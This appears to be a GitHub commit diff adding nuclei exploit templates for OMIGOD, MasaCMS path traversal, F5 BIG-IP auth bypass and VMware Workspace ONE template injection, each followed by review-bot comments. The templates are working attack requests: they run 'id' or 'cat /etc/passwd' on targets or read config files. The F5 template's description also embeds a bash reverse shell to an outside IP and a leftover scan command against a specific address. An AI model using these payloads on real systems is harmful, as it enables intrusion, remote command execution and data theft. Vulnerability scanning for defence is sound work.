Showing
31 changed files
with
2,014 additions
and
0 deletions.
@@ -0,0 +1,57 @@ | ||
id: CVE-2021-38647_51pwn | ||
|
||
info: | ||
name: OMIGOD – RCE Vulnerability in Multiple Azure Linux Deployments CVE-2021-38647 | ||
author: 51pwn | ||
severity: Critical | ||
description: | | ||
On September 14, multiple vulnerabilities were discovered by researchers at Wiz.io. | ||
The most critical of them being CVE-2021-38647, now dubbed OMIGOD, | ||
which effects the Open Management Infrastructure (OMI) agent in versions 1.6.8.0 and below. | ||
reference: | ||
- https://www.horizon3.ai/omigod-rce-vulnerability-in-multiple-azure-linux-deployments/ | ||
|
||
tags: RCE,Web | ||
|
||
requests: | ||
- raw: | ||
- | | ||
POST /wsman HTTP/1.1 | ||
Connection: close | ||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 | ||
Host: {{Hostname}} | ||
Content-Type: application/soap+xml;charset=UTF-8 | ||
<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:h="http://schemas.microsoft.com/wbem/wsman/1/windows/shell" xmlns:n="http://schemas.xmlsoap.org/ws/2004/09/enumeration" xmlns:p="http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd" xmlns:w="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd" xmlns:xsi="http://www.w3.org/2001/XMLSchema"> | ||
<s:Header> | ||
<a:To>HTTP://192.168.1.1:5986/wsman/</a:To> | ||
<w:ResourceURI s:mustUnderstand="true">http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem</w:ResourceURI> | ||
<a:ReplyTo> | ||
<a:Address s:mustUnderstand="true">http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:Address> | ||
</a:ReplyTo> | ||
<a:Action>http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem/ExecuteShellCommand</a:Action> | ||
<w:MaxEnvelopeSize s:mustUnderstand="true">102400</w:MaxEnvelopeSize> | ||
<a:MessageID>uuid:0AB58087-C2C3-0005-0000-000000010000</a:MessageID> | ||
<w:OperationTimeout>PT1M30S</w:OperationTimeout> | ||
<w:Locale xml:lang="en-us" s:mustUnderstand="false" /> | ||
<p:DataLocale xml:lang="en-us" s:mustUnderstand="false" /> | ||
<w:OptionSet s:mustUnderstand="true" /> | ||
<w:SelectorSet> | ||
<w:Selector Name="__cimnamespace">root/scx</w:Selector> | ||
</w:SelectorSet> | ||
</s:Header> | ||
<s:Body> | ||
<p:ExecuteShellCommand_INPUT xmlns:p="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem"> | ||
<p:command>id</p:command> | ||
<p:timeout>0</p:timeout> | ||
</p:ExecuteShellCommand_INPUT> | ||
</s:Body> | ||
</s:Envelope> | ||
# end | ||
matchers-condition: and | ||
matchers: | ||
- type: regex | ||
regex: | ||
- <p:StdOut>(.*uid=.*)<\/p:StdOut> | ||
|
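Review bot: The template has no `classification` block, so scanner output cannot be correlated with the CVE that only appears in the `id` and `name` strings; add `classification:` with `cve-id: CVE-2021-38647` plus `cvss-metrics` and `cwe-id`, as the other templates in this commit do. `severity: Critical` and `tags: RCE,Web` are capitalised where the sibling templates use lowercase (`severity: critical`, `tags: cve,cve2021,rce`); the severity value may well be accepted case-insensitively, but mixed-case tags risk not matching lowercase tag filters and break the convention of the rest of the set. The `description` also names the affected versions (1.6.8.0 and below) without saying which fixed version closes the issue; a one-line remediation note there would make the finding actionable for whoever receives the report.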
@@ -0,0 +1,26 @@ | ||
id: CVE-2021-42183_51pwn | ||
info: | ||
name: MasaCMS 7.2.1 is affected by a path traversal vulnerability in /index.cfm/_api/asset/image/. | ||
author: 51pwn | ||
severity: critical | ||
reference: | ||
- https://github.com/hktalent/nuclei-templates | ||
- https://51pwn.com | ||
tags: oss | ||
|
||
requests: | ||
- raw: | ||
- |+ | ||
GET /_api/asset/image/?filePath=/../config/settings.ini.cfm HTTP/1.1 | ||
Host: {{Hostname}} | ||
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 | ||
Pragma:no-cache | ||
unsafe: true | ||
cookie-reuse: true | ||
req-condition: true | ||
|
||
matchers-condition: or | ||
matchers: | ||
- type: dsl | ||
dsl: | ||
- "status_code_1 == 200" |
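Review bot: The only matcher is `status_code_1 == 200`, so any host that answers this path with HTTP 200 — a generic error page, a login page, a WAF placeholder — is reported as vulnerable; a status code alone is not evidence of file disclosure, and findings from this template should be treated as unconfirmed until reviewed. The `name` field holds a full sentence ending in a period; keep `name` short, e.g. `name: MasaCMS 7.2.1 - Path Traversal`, and move the sentence into a `description:` block, which is currently missing. There is no `classification` block and both `reference` entries point at the author's own sites rather than an advisory; add `classification:` with `cve-id: CVE-2021-42183` and a vendor or NVD reference so the check can be traced to its source.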
@@ -0,0 +1,58 @@ | ||
id: CVE-2022-1388_51pwn | ||
|
||
info: | ||
name: F5 BIG-IP iControl REST Auth Bypass RCE | ||
author: dwisiswant0 | ||
severity: critical | ||
description: | | ||
doNuclei https://181.188.0.131 ~/MyWork/mybugbounty/yaml/CVE-2022-1388.yaml | ||
This vulnerability may allow an unauthenticated attacker | ||
with network access to the BIG-IP system through the management | ||
port and/or self IP addresses to execute arbitrary system commands, | ||
create or delete files, or disable services. There is no data plane | ||
exposure; this is a control plane issue only. # "utilCmdArgs": "-c 'bash -i >& /dev/tcp/107.182.191.202/1234 0>&1' " | ||
reference: | ||
- https://twitter.com/GossiTheDog/status/1523566937414193153 | ||
- https://support.f5.com/csp/article/K23605346 | ||
classification: | ||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H | ||
cvss-score: 9.80 | ||
cve-id: CVE-2022-1388 | ||
cwe-id: CWE-306 | ||
metadata: | ||
shodan-query: http.title:"BIG-IP®-+Redirect" +"Server" | ||
verified: true | ||
tags: bigip,cve,cve2022,rce,mirai | ||
|
||
variables: | ||
auth: "admin:" | ||
|
||
requests: | ||
- raw: | ||
- | | ||
POST /mgmt/tm/util/bash HTTP/1.1 | ||
Host: {{Hostname}} | ||
Connection: Keep-Alive, X-F5-Auth-Token, X-Forwarded-Host | ||
X-F5-Auth-Token: a | ||
Authorization: Basic {{base64(auth)}} | ||
Content-Type: application/json | ||
{ | ||
"command": "run", | ||
"utilCmdArgs": "-c id" | ||
} | ||
matchers-condition: and | ||
matchers: | ||
- type: regex | ||
regex: | ||
- "(commandResult)" | ||
- "(uid=\\d+\\(.*)" | ||
- type: status | ||
status: | ||
- 200 | ||
condition: and | ||
extractors: | ||
- type: regex | ||
part: body | ||
regex: | ||
- "(uid=\\d+\\([^\\n]{3,})" |
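Review bot: The `description: |` block scalar contains operator leftovers that are published as template text: its first line is a local `doNuclei … ~/MyWork/mybugbounty/…` invocation against a specific IP address, and its last line carries a trailing `# …` fragment that, because it sits inside a `|` block scalar, is not a YAML comment but part of the description and embeds a third-party IP and port. Both lines should be removed before publishing so the description holds only the vulnerability summary and no scan targets or private paths. The rest of the template appears to be the upstream `dwisiswant0` template with the `id` suffixed `_51pwn`; if so, keep `author` as it is and add the upstream repository to `reference` so provenance is explicit.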
@@ -0,0 +1,37 @@ | ||
id: CVE-2022-22954_51pwn | ||
|
||
info: | ||
name: VMware Workspace ONE Access - Server-Side Template Injection | ||
author: 51pwn | ||
severity: critical | ||
description: | | ||
VMware Workspace ONE Access is susceptible to a remote code execution vulnerability due to a server-side template injection flaw. An unauthenticated attacker with network access could exploit this vulnerability by sending a specially crafted request to a vulnerable VMware Workspace ONE or Identity Manager. | ||
reference: | ||
- https://www.tenable.com/blog/vmware-patches-multiple-vulnerabilities-in-workspace-one-vmsa-2022-0011 | ||
- https://www.vmware.com/security/advisories/VMSA-2022-0011.html | ||
- http://packetstormsecurity.com/files/166935/VMware-Workspace-ONE-Access-Template-Injection-Command-Execution.html | ||
- https://nvd.nist.gov/vuln/detail/CVE-2022-22954 | ||
classification: | ||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H | ||
cvss-score: 9.8 | ||
cve-id: CVE-2022-22954 | ||
cwe-id: CWE-94 | ||
metadata: | ||
shodan-query: http.favicon.hash:-1250474341 | ||
tags: cve,cve2022,vmware,ssti,workspaceone,cisa | ||
|
||
requests: | ||
- method: GET | ||
path: | ||
# - "{{BaseURL}}/catalog-portal/ui/oauth/verify?error=&deviceUdid=${"freemarker.template.utility.Execute"?new()("cat /etc/passwd")}" # Executes cat /etc/passwd | ||
- "{{BaseURL}}/catalog-portal/ui/oauth/verify?error=&deviceUdid=%24%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%22%29%7d" # Executes cat /etc/passwd | ||
|
||
matchers-condition: and | ||
matchers: | ||
- type: word | ||
part: body | ||
words: | ||
- "root:*:0:0:" | ||
|
||
|
||
# Enhanced by mp on 2022/07/06 |
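Review bot: The `author` field says `51pwn`, but the trailing `# Enhanced by mp on 2022/07/06` comment and the `_51pwn` suffix on `id` indicate the template was taken from an upstream nuclei-templates entry and re-attributed; credit the original author (`author: <upstream author>,51pwn`, with the upstream name filled in) and add the upstream repository to `reference`, otherwise the provenance of the check is lost. The commented-out first `path` entry and the inline `# Executes cat /etc/passwd` remark are the only explanation of what the encoded URL does; either keep that commented line as documentation or fold a one-sentence explanation into `description`, rather than leaving it to a dangling trailing comment.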